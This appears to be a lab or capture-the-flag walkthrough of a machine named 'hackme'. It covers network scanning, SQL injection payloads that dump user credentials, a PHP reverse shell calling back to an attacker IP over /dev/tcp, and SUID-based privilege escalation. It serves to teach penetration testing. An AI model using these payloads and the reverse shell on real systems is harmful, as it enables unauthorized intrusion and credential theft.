Initial Foothold
- Network discovery
nmap -sn 192.168.60.128/24
My target is 192.168.60.129.
2. TCP Portscan
nmap -Pn 192.168.60.129nmap -Pn -p1000- 192.168.60.129
There’re 2 services: ssh and http
3. UDP scan
nmap -sU -sV 192.168.60.129
4. OS and service scan
nmap -A -p22,80 192.168.60.129
5. Vuln scan
nmap --script vuln -p22,80 192.168.60.129
There’re HTTP pages the I can access.
Service Enumeration
- SSH
Connect
ssh 192.168.60.129
- HTTP
- nikto scan
nikto -h http://192.168.60.129
2. Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.129/ -x php,txt,html,sh,cgi -q
3. Access site
There’s a username and password requirement and I also can sign up.
View page source
Access /uploads/
Register new user
Log in
There’s a search function and 3 columns. My guess is search function calls SQL query.
Exploitation
- Test for SQL injection
1' or 1=1--
No data
Try another test query
1' or 1=1-- -
Succeeded. Next to continue to inject query to retrieve some data.
There’re 3 columns, my guess is I’ll union w/ 1,2,3. No need to test for column numbers like this:
1' union select 1-- -1' union select 1,2-- -
So my query is:
1' union select 1,2,3-- -
As predicted, there’re 3 columns needed for this query.
Retrieve trivial data
1' union select @@version,@@hostname,database()-- -
The host version is 5.7.25–0ubuntu0.18.10.2.
The hostname is hackme.
Database is webapphacking.
Get table name
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
I have 2 tables: books and users.
Table: users is interesting. I will find its columns.
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()-- -
I have 5 columns: id, user, password, name, and address.
I need 3 columns: id, user, and password.
1' union select 1,group_concat(id,':',user,':',pasword),3 from users-- -
Copy it and organize w/ editor for easier viewing.
My intersintes is ‘superadmin’
Copy the hash and crack w/ crackstation. Now I have the password.
Login as superadmin.
I can upload files. I’ll try to upload reverse shell.
Prepare a reverse shell PHP script.
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.60.128/443 0>&1'");
Prepare listener
rlwrap nc -lvp 443
Upload the file
Access it via /uploads/, click the file.
Back to the listener, now I got the connection.
Test it
id
Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Privilege Escalation
- Explore directory
cd /var/www/htmlcat config.php
I got MySQL root’s credential.
Try to re-use it via SSH service.
ssh 192.168.60.129password: hackme1qaz@WSX
Failed!!!
cd /home/legacyls -la
I found this ‘touchmenot’ file.
Let’s try to run it
./touchmenot
Now I’m root.
The reason behind running it and get root shell immediately is SUID. Normally, you have to verify for SUID w/ this command
find / -perm -u=s -type f 2>/dev/null
From the result, you can continue the escalation process. This time, I’m just lucky w/ directory enumeration process and save a lot of time finding it.